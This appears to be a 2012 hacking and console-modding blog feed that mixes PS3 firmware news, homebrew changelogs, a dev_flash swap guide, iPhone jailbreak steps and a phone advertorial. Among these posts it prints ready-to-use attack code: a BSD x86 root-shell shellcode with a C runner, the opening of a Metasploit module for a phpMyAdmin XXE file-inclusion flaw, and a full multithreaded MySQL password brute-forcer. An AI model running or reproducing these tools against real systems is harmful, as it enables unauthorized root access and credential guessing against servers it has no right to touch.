Jan 22 2012
Reading over at multiple websites news comes that a new debug firmware 4.01 has been leaked to the masses. No changelog has been released yet but I’m sure that will follow once some developers catch wind of this new firmware update. With that said one does wonder when a retail firmware update will be released. For those who do not know this firmware is for test/debug developer PlayStation 3′s and not the retail machines we the public own.
Sources: playstationlandia.com & ps3-addict.fr
Jan 22 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
###
# Title : bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) shellcode - 94 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Type : Shellcode - 94 Bytes
# BSD's : FreeBSD , OpenBSD , DragonflyBSD
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
##
*/
#include <stdio.h>
char sc[] =
"\x31\xC0" // xor %eax,%eax
"\x50" // push %eax
"\x50" // push %eax
"\x50" // push %eax
"\xB0\x7E" // mov %al,$0x7E
"\xCD\x80" // int $0x80
"\x6A\x3B" // push $0x3B
"\x58" // pop %eax
"\x99" // csq
"\x52" // push %edx
"\x68\x2D\x63\x00\x00" // push $0x632D
"\x89\xE7" // mov %edi,%esp
"\x52" // push %edx
"\x68\x6E\x2F\x73\x68" // push $0x68732F6E
"\x68\x2F\x2F\x62\x69" // push $0x69622F2F
"\x89\xE3" // mov %ebx,%esp
"\x52" // push %edx
"\xE8\x20\x90\x90" // call me
"\x2F" // das
"\x62\x69\x6E" // bound %ebp,qword %ecx $0x6E
"\x2F" // das
"\x73\x68" // jnb short me
"\x20\x2D\x63\x20\x22\x2F" // and $0x2F222063,%ch
"\x65\x74\x63" // je short me
"\x2F" // das
"\x6D" // ins dword %edi,%dx
"\x61" // popad
"\x73\x74" // jnb short
"\x65\x72\x2E" // jb short
"\x70\x61" // jo short
"\x73\x73" // jnb short
"\x77\x64" // ja short
"\x22\x00" // and %al,%eax
"\x57" // push %edi
"\x53" // push %ebx
"\x89\xE1" // mov %ecx,%esp
"\x52" // push %edx
"\x51" // push %ecx
"\x53" // push %ebx
"\x50" // push %eax
"\xCD\x80" // int $0x80
"\x31\xC0" // xor %eax,%eax
"\x50" // push %eax
"\xB0\x01" // mov %al,$0x01
"\xCD\x80"; // int $0x80
int main()
{
int (*dz)() = (int(*)())sc;
printf("bytes: %u\n", strlen(sc));
dz();
}
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================Jan 22 2012
# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
Continue reading "Hack – phpMyAdmin 3.3.x / 3.4.x Local File Inclusion Via XXE Injection"Jan 22 2012
Solar v3.1
Changelog:
Fixed bug while removing USB drives “hot-pluging now works”.
Added more USB devices compatibility.
Added more UI for mp3 player.
Added Exit Dialog interface. “very fast and user friendly”.
Faster Loading to multiMAN and Browser.
Fixed a memory bug.
Fixed hang/crash if MP3s were not found.
Added Message for Hot-plugging and End of Playlist.
Increased Solar’s boot time.
Fixed Keytones, now single beeps, and removed for some keys.
More code cleanup, and other things I can’t remember.
Download: Solar 3.1
Jan 22 2012
DeViL303 has released an update to his XMB File Manager, XMBFM, to Beta version 0.03. This time he has released two versions, one for debug XMB’s and the other for retail XMB’s. Although reports indicated that this was version 0.03 and announced as such, once installed you will see that the version number is 0.04. An explanation from DeViL303 in the quote below. (Thanks to bitsbubba for pointing this out.)
Gonna Change the suffix next time a its confussing because “R” could be for Rebug but it not, it should work on any 3.55 retail xmb, 3.55 kmeaw , 3.55 Official FW, rebug 3.55 retail xmb(in rebug mode) etc.
Originally Posted by DeViL303 via ps3crunch.netPlease note the following:
Jan 22 2012
Note: This modification does not allow the installation / usage of unsigned content / PS3 homebrew etc. This is purely a convenience hack and is aimed for use by those who have hardware flashers which allow dual boot.
After technodon’s work creating a modified kiosk dev_flash which lets you install retail signed package files. The restrictions of having to use kiosk firmware inspired me to find a way to add “Install Package Files” for retail firmware.
This is hack does the following things:
adds “★ Install Package Files” and “★ /app_home/PS3_GAME/” to “GAME” on the XMB (allowing the user to install retail package files anytime they want)
adds other debug functions which are small but still there
does not give access to “★ Debug Setting” (reasons for this are explained below)
Installation instructions:
This installation procedure is the similar to technodon’s original dev_flash hdd swap procedure
For this you will need two hard drives a e3 flasher or similar device to downgrade your PS3 (assuming that you’re on firmware 4.00 and you have an e3 flasher)
downgrade to 3.55 using the downgrade tools from e3 (Of course when downgrading to 3.55 make sure you use a different hdd than the hdd which you were using 4.00)
once booted back into the xmb turn off the console
swap hard drives turn on the system, press the PS button and you will be asked to reinstall the firmware
place the pup file from the e3 downgrade tools in the normal PS3/UPDATE usb folder and follow the on-screen instructions to reinstall the firmware
then install dev_blind.pkg & Blackb0x FTP from install packages
run dev_blind then BlackB0x and FTP into the console
goto /dev_blind delete everything and replace them with the customised dev_flash
press the ps button and the console should reboot and and ask to reinstall the firmware again, switch off the console and swap the hard drive back
turn on the console press the ps button twice
the console should boot back into 3.55 Rogero
goto system update and install 4.00 OFW
once installed turn the console off again and swap hard drives back and you should boot into a modified 4.00 retail firmware.
My package (Click to download) includes:
My modded dev_flash
OFW 4.00 PS3UPDAT.PUP
P.S. BTW the “nas_plugin.sprx” in this dev_flash has not been altered to achieve “Install Package Files”. Also for those who will analyze my modded dev_flash, you will find that I have used debug .sprx files from the a debug 4.00 pup.
P.P.S. I originally intended to get “★ Debug Settings” to work with this. But usage of “debug settings” required the ps3 to use a debug vsh.self, and that crashes the ps3 when trying to load applications (I did some other things as well to prevent the PS3 from giving me a RSOD when I swapped the vsh.self files, I’m not detailing it in public because I don’t want Sony to patch it).
Jan 22 2012
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Library General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $
*
* Author:
* NAME: James Stevenson
* WWW: http://www.stev.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <getopt.h>
#include <string.h>
#include <pthread.h>
#include <mysql/mysql.h>
int verbose = 0;
int total = 0;
volatile int quit = 0;
pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER;
struct args {
char *host;
char *db;
int port;
};
void print_help(FILE *fp, char *app) {
fprintf(fp, "Usage: %s [<options>]\n", app);
fprintf(fp, "\n");
fprintf(fp, " -h Print this help and exit\n");
fprintf(fp, " -v Verbose. Repeat for more info\n");
fprintf(fp, " -t <host> host to try\n");
fprintf(fp, " -p <port> port to connect on\n");
fprintf(fp, " -n <num> number of threads to use\n");
fprintf(fp, "\n");
fprintf(fp, "Note: usernames / password will be read from stdin\n");
fprintf(fp, "The format for this is username:password\n");
fprintf(fp, "\n");
}
int try(char *hostname, char *username, char *password, char *db, int port) {
MYSQL mysql;
mysql_init(&mysql);
if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) {
switch(mysql_errno(&mysql)) {
case 1045: /* ER_ACCESS_DENIED_ERROR */
if (verbose >= 1)
printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
break;
default:
printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql));
break;
}
return 0;
}
if (verbose >= 1)
printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
mysql_close(&mysql);
return 1;
}
int getpassword(char **buf, size_t *buflen, char **username, char **password) {
pthread_mutex_lock(&mutex_pass);
if (getline(buf, buflen, stdin) >= 0) {
pthread_mutex_unlock(&mutex_pass);
char *tmp = strchr(*buf, ':');
if (tmp == 0 || tmp[1] == 0)
return 0;
*username = *buf;
*tmp = 0;
tmp++;
*password = tmp;
tmp = strchr(*password, '\n');
if (tmp != 0)
*tmp = 0;
if (verbose >= 2)
printf("username: %s password: %s\n", *username, *password);
return 1;
}
pthread_mutex_unlock(&mutex_pass);
return 0;
}
void *run(void *p) {
struct args *a = (struct args *) p;
char *buf = 0;
size_t buflen = 0;
char *user = 0;
char *pass = 0;
while(quit == 0) {
if (getpassword(&buf, &buflen, &user, &pass) == 0)
goto free; /* we ran out of passwords */
if (try(a->host, user, pass, a->db, a->port)) {
printf("Success! Username: %s Password: %s\n", user, pass);
quit = 1;
goto free;
}
}
free:
if (buf != NULL)
free(buf);
pthread_exit(NULL);
return NULL;
}
int main(int argc, char **argv) {
struct args args;
pthread_t *thd;
pthread_attr_t attr;
int nthreads = 1;
int i = 0;
int c;
memset(&args, 0, sizeof(args));
while( (c = getopt(argc, argv, "d:hn:p:t:v")) != -1) {
switch(c) {
case 'd':
args.db = optarg;
break;
case 'h':
print_help(stdout, argv[0]);
exit(EXIT_SUCCESS);
break;
case 'n':
nthreads = atoi(optarg);
break;
case 't':
args.host = optarg;
break;
case 'v':
verbose++;
break;
case 'p':
args.port = atoi(optarg);
break;
}
}
if (args.db == NULL)
args.db = "mysql";
if (args.host == NULL)
args.host = "localhost";
thd = malloc(nthreads * sizeof(*thd));
if (!thd) {
perror("malloc");
exit(EXIT_FAILURE);
}
mysql_library_init(0, NULL, NULL);
if (pthread_attr_init(&attr) != 0) {
perror("pthread_attr_init");
exit(EXIT_FAILURE);
}
if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) {
perror("pthread_attr_setdetachstate");
exit(EXIT_FAILURE);
}
for(i=0;i<nthreads;i++) {
if (pthread_create(&thd[i], NULL, run, &args) != 0) {
perror("pthread_create");
exit(EXIT_FAILURE);
}
}
for(i=0;i<nthreads;i++) {
if (pthread_join(thd[i], NULL) != 0) {
perror("pthread_join");
exit(EXIT_FAILURE);
}
}
pthread_attr_destroy(&attr);
free(thd);
mysql_library_end();
return EXIT_SUCCESS;
}Jan 20 2012
Step 1: Connect your iPhone 4S / iPad 2 with your PC via USB, and open iTunes then Restore to iOS 5.0.1.
Step 1: Download Greenpois0n Absinthe, then unzip and run the file.
Step 2: Connect your iPhone 4S / iPad 2 with your PC via USB.
Step 3: Simply click on “Jailbreak” button follow the steps appear on the greenpois0n screen.
Step 4: Once completed, you should see an Absinthe icon on the Home screen. Tap the Absinthe icon, it will open GreenPois0n site, and will then reboot your device. Once it loads again, the Cydia icon will have replaced the Absinthe icon. Non enjoy your iPhone 4S / iPad 2 5.0.1 untethered jailbreak.
Jan 20 2012
Firmware:
The supported firmware versions will be:
iPhone4S owners looking to maximize their chances of achieving an eventual software-based carrier unlock should be staying at 5.0. Everyone else should be at 5.0.1. If you’re an iPhone4S owner who already updated to 5.0.1, it’s too late to go back down to 5.0, but if you’re on 9A406 it is possible to downgrade the BB by going to the 9A405 version of 5.0.1 while the window is still open.
Support:
The overall flow used by the GUI and CLI to inject the A5 corona jailbreak has never been done before, and there may be unforeseen problems once it’s released to the public. It’s very important for you to sync your data, photos, and music before attempting any version of this jailbreak. We’ll be watching the comments section below for signs of any widespread problems, but please be aware that you jailbreak at your own risk!
Updates:
Download Greenpois0n Absinthe 1.2.2 for Mac
Jan 20 2012
If you have been looking for a suitable alternative to the iPhone, chances are you have spent quite a bit of time finding options that just don’t quite stack up to the dominant Apple product. Partially due to advertisement, partially to the company’s overall success, and also because of its sleek appearance and stunning performance, the Apple iPhone has come to dominate the smart phone market, allowing very few other options to succeed. However, if there is one company that has consistently challenged Apple in the smart phone industry, it is undoubtedly Samsung, which has managed to produce a couple of phones in recent years that rival the iPhone in every category of ratings. The latest in this series of competitors is the Samsung Galaxy Ace, which you can secure through your O2 provider.
One of the most notable features of the Samsung Galaxy Ace is its undeniably “sleek” beauty. While the majority of consumers will certainly tell you that function matters more than appearance, there’s no denying that most people also care about how their phone looks. Well, they don’t get a whole lot nicer than the Galaxy Ace where appearance is concerned, as this little smart phone is a thing of beauty. This may not be enough to tempt you on its own, but when you consider the high functionality of the phone and its strong reviews, you’ll definitely see why this phone is one of the best options out there.
If you do much research on the Galaxy Ace and what differentiates it from its competitors, you will probably see a lot about the 800MHz processor it has, which is one of its most advanced features. Basically, a processor of this calibre allows the Ace to run multiple high-speed programs simultaneously, allowing you extremely advanced and thorough functionality. You will find that with this processor, the phone runs applications and downloads at a much higher speed, allowing you maximum ease and convenience.
Finally, there are also consumer reviews to consider, and it is well worth noting that just about everybody who touches one of these phones loves it. Many note the quick-type “swipe” texting function as a major advantage over other touch screen typing, and the 5 mega-pixel built-in camera also wins over many consumers. As you can see, the Galaxy Ace satisfies a wide variety of different desires you may have in your smart phone, which is why it is well worth considering if you are looking for a new phone.